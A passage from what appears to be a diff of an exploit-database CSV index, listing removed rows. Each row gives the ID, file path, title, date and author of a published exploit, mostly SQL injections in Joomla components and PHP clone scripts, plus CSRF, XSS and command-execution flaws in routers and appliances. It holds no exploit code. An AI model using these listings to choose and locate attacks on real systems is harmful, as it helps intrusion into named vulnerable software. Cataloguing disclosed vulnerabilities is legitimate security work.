-41292,exploits/php/webapps/41292.txt,"Gram Post 1.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41293,exploits/php/webapps/41293.txt,"Youtube Analytics Multi Channel 3.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41294,exploits/php/webapps/41294.txt,"Collabo - Arbitrary File Download",2017-02-10,"Ihsan Sencan",php,webapps, -41295,exploits/php/webapps/41295.txt,"Takas Classified 1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41296,exploits/php/webapps/41296.txt,"Zigaform - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41300,exploits/php/webapps/41300.txt,"Multilanguage Estate Agency Pro 1.2 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41301,exploits/php/webapps/41301.txt,"QWIKIA 1.1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41302,exploits/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41303,exploits/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41304,exploits/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41305,exploits/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41306,exploits/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41299,exploits/hardware/webapps/41299.html,"D-Link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps, -41307,exploits/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps, -41308,exploits/php/webapps/41308.txt,"WordPress Plugin Insert PHP 3.3.1 - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps, -41309,exploits/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,windows,webapps, -41310,exploits/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps, -41311,exploits/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps, -41312,exploits/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps, -41328,exploits/php/webapps/41328.txt,"Joomla! Component Soccer Bet 4.1.5 - 'userid' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps, -41313,exploits/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps, -41314,exploits/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps, -41315,exploits/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps, -41316,exploits/php/webapps/41316.txt,"Viavi Movie Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps, -41317,exploits/php/webapps/41317.txt,"Viavi Product Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps, -41318,exploits/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps, -41319,exploits/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps, -41322,exploits/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps, -41323,exploits/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps, -41324,exploits/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps, -41325,exploits/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps, -41326,exploits/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps, -41327,exploits/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' SQL Injection",2017-02-11,"Persian Hack Team",php,webapps, -41329,exploits/php/webapps/41329.txt,"PHP Marketplace Script - SQL Injection",2017-02-13,Th3GundY,php,webapps, -41330,exploits/php/webapps/41330.txt,"Joomla! Component JE Classify Ads 1.2 - 'pro_id' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41331,exploits/php/webapps/41331.txt,"Joomla! Component JE Gallery 1.3 - 'photo_id' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41332,exploits/php/webapps/41332.txt,"Joomla! Component JE Directory 1.7 - 'ditemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41333,exploits/php/webapps/41333.txt,"Joomla! Component JE QuoteForm - 'Itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41334,exploits/php/webapps/41334.txt,"Joomla! Component JE Property Finder 1.6.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41335,exploits/php/webapps/41335.txt,"Joomla! Component JE Tour 2.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41336,exploits/php/webapps/41336.txt,"Joomla! Component JE Video Rate 1.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41337,exploits/php/webapps/41337.txt,"Joomla! Component JE auction 1.6 - 'eid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41338,exploits/php/webapps/41338.txt,"Joomla! Component JE Auto 1.5 - 'd_itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41339,exploits/php/webapps/41339.txt,"Joomla! Component JE Awd Song 1.8 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41340,exploits/php/webapps/41340.txt,"Joomla! Component Hbooking 1.9.9 - 'h_id' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41341,exploits/php/webapps/41341.txt,"Joomla! Component JE Quiz 2.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41342,exploits/php/webapps/41342.txt,"Joomla! Component JE Grid Folio - 'id' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41343,exploits/php/webapps/41343.txt,"Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41344,exploits/php/webapps/41344.txt,"Joomla! Component JE Form Creator 1.8 - 'Itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41345,exploits/php/webapps/41345.txt,"Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41346,exploits/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41347,exploits/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps, -41359,exploits/php/webapps/41359.txt,"Itech B2B Script 4.29 - Multiple Vulnerabilities",2017-02-12,"Marc Castejon",php,webapps, -41360,exploits/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,hardware,webapps, -41361,exploits/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,hardware,webapps, -41362,exploits/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps, -41368,exploits/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps, -41371,exploits/php/webapps/41371.txt,"Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps, -41372,exploits/php/webapps/41372.txt,"Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps, -41373,exploits/php/webapps/41373.txt,"Joomla! Component Spider Facebook 1.6.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps, -41374,exploits/php/webapps/41374.txt,"Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps, -41376,exploits/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps, -41377,exploits/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80 -41378,exploits/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps, -41379,exploits/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps, -41380,exploits/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps, -41382,exploits/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps, -41383,exploits/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41384,exploits/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41385,exploits/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41386,exploits/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41387,exploits/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41388,exploits/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41389,exploits/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41390,exploits/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41391,exploits/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41392,exploits/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",php,webapps, -41393,exploits/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps, -41394,exploits/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps, -41395,exploits/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps, -41396,exploits/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps, -41399,exploits/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps, -41400,exploits/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps, -41401,exploits/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps, -41402,exploits/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps, -41595,exploits/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",php,webapps, -41404,exploits/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps, -41405,exploits/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps, -41406,exploits/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps, -41407,exploits/php/webapps/41407.txt,"Joomla! Component Eventix Events Calendar 1.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps, -41408,exploits/php/webapps/41408.txt,"Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps, -41409,exploits/php/webapps/41409.txt,"Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps, -41410,exploits/php/webapps/41410.txt,"Joomla! Component Magic Deals Web 1.2.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps, -41411,exploits/php/webapps/41411.txt,"Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps, -41412,exploits/php/webapps/41412.txt,"Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps, -41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,php,webapps, -41414,exploits/linux/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,linux,webapps, -41415,exploits/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps, -41416,exploits/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps, -41424,exploits/php/webapps/41424.rb,"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps, -41427,exploits/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps, -41428,exploits/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps, -41429,exploits/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps, -41430,exploits/php/webapps/41430.txt,"Joomla! Component BookLibrary 3.6.1 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps, -41431,exploits/php/webapps/41431.txt,"Joomla! Component MediaLibrary Basic 3.5 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps, -41432,exploits/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps, -41433,exploits/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps, -41437,exploits/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps, -41438,exploits/php/webapps/41438.txt,"WordPress Plugin Mail Masta 1.0 - SQL Injection",2017-02-18,"Hanley Shun",php,webapps, -41440,exploits/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps, -41441,exploits/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps, -41442,exploits/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps, -41444,exploits/php/webapps/41444.txt,"Joomla! Component JooDatabase 3.1.0 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps, -41445,exploits/php/webapps/41445.txt,"Joomla! Component JO Facebook Gallery 4.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps, -41446,exploits/php/webapps/41446.txt,"Joomla! Component AJAX Search for K2 2.2 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps, -41447,exploits/php/webapps/41447.txt,"Joomla! Component Community Surveys 4.3 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps, -41448,exploits/php/webapps/41448.txt,"Joomla! Component Community Polls 4.5.0 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps, -41449,exploits/macos/webapps/41449.html,"Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",macos,webapps, -41450,exploits/php/webapps/41450.txt,"Joomla! Component GPS Tools 4.0.1 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps, -41451,exploits/multiple/webapps/41451.html,"Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass",2017-02-24,"Google Security Research",multiple,webapps, -41452,exploits/php/webapps/41452.txt,"Joomla! Component Community Quiz 4.3.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps, -41453,exploits/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps, -41455,exploits/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps, -41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps, -41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,hardware,webapps, -41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps, -41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",multiple,webapps, -41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps, -41463,exploits/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps, -41464,exploits/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps, -41465,exploits/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps, -41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps, -41470,exploits/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps, -41472,exploits/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps, -41478,exploits/hardware/webapps/41478.txt,"D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps, -41492,exploits/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps, -41482,exploits/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps, -41483,exploits/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80 -41484,exploits/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80 -41485,exploits/php/webapps/41485.html,"WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery",2017-03-01,"Radjnies Bhansingh",php,webapps,80 -41486,exploits/php/webapps/41486.txt,"WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting",2017-03-01,"Han Sahin",php,webapps,80 -41487,exploits/php/webapps/41487.html,"WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery",2017-03-01,"Yorick Koster",php,webapps,80 -41488,exploits/php/webapps/41488.html,"WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery",2017-03-01,"David Vaartjes",php,webapps,80 -41489,exploits/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps, -41490,exploits/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps, -41491,exploits/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps, -41493,exploits/php/webapps/41493.txt,"Joomla! Component Abstract 2.1 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps, -41494,exploits/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps, -41495,exploits/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps, -41496,exploits/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps, -41497,exploits/php/webapps/41497.php,"WordPress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps, -41499,exploits/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps, -41500,exploits/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps, -41501,exploits/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps, -41502,exploits/hardware/webapps/41502.txt,"EPSON TMNet WebConfig 1.00 - Cross-Site Scripting",2017-03-03,"Michael Benich",hardware,webapps, -41504,exploits/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps, -41505,exploits/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps, -41506,exploits/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps, -41507,exploits/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps, -41508,exploits/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps, -41512,exploits/php/webapps/41512.txt,"Advanced Bus Booking Script 2.04 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41513,exploits/php/webapps/41513.txt,"Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41514,exploits/php/webapps/41514.txt,"Single Theater Booking Script - 'newsid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41515,exploits/php/webapps/41515.txt,"Responsive Events & Movie Ticket Booking Script - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41516,exploits/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41517,exploits/php/webapps/41517.txt,"Redbus Clone Script 3.05 - 'hid_Busid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41518,exploits/php/webapps/41518.txt,"Groupon Clone Script 3.01 - 'catid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41519,exploits/php/webapps/41519.txt,"Naukri Clone Script 3.02 - 'type' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41520,exploits/php/webapps/41520.txt,"Yellow Pages Clone Script 1.3.4 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41521,exploits/php/webapps/41521.txt,"Advanced Matrimonial Script 2.0.3 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41522,exploits/php/webapps/41522.txt,"Advanced Real Estate Script 4.0.6 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41523,exploits/php/webapps/41523.txt,"PHP Classifieds Rental Script 3.6.0 - 'scatid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41524,exploits/php/webapps/41524.txt,"Entrepreneur B2B Script 2.0.4 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41525,exploits/php/webapps/41525.txt,"PHP Matrimonial Script 3.0 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41526,exploits/php/webapps/41526.txt,"MLM Binary Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41527,exploits/php/webapps/41527.txt,"MLM Forced Matrix 2.0.7 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41528,exploits/php/webapps/41528.txt,"MLM Forex Market Plan Script 2.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41529,exploits/php/webapps/41529.txt,"MLM Membership Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41530,exploits/php/webapps/41530.txt,"Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41531,exploits/php/webapps/41531.txt,"Network Community Script 3.0.2 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41532,exploits/php/webapps/41532.txt,"PHP B2B Script 3.05 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41533,exploits/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41534,exploits/php/webapps/41534.txt,"Schools Alert Management Script 2.01 - 'list_id' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41535,exploits/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41536,exploits/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41539,exploits/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps, -41540,exploits/php/webapps/41540.py,"WordPress Multiple Plugins - Arbitrary File Upload",2017-03-03,"The Martian",php,webapps, -41541,exploits/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",json,webapps, -41543,exploits/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps, -41544,exploits/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps, -41546,exploits/aix/webapps/41546.txt,"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities",2017-03-07,RandoriSec,aix,webapps, -41548,exploits/php/webapps/41548.txt,"Themeforest Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps, -41549,exploits/php/webapps/41549.txt,"Graphicriver Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps, -41550,exploits/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps, -41551,exploits/php/webapps/41551.txt,"Audiojungle Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps, -41552,exploits/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps, -41553,exploits/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps, -41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",multiple,webapps, -41556,exploits/php/webapps/41556.txt,"Country on Sale Script - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41557,exploits/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41558,exploits/php/webapps/41558.txt,"Soundify 1.1 - 'tid' SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41559,exploits/php/webapps/41559.txt,"BistroStays 3.0 - 'guests' SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41560,exploits/php/webapps/41560.txt,"Nlance 2.2 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps, -41562,exploits/php/webapps/41562.txt,"Fashmark 1.2 - 'category' SQL 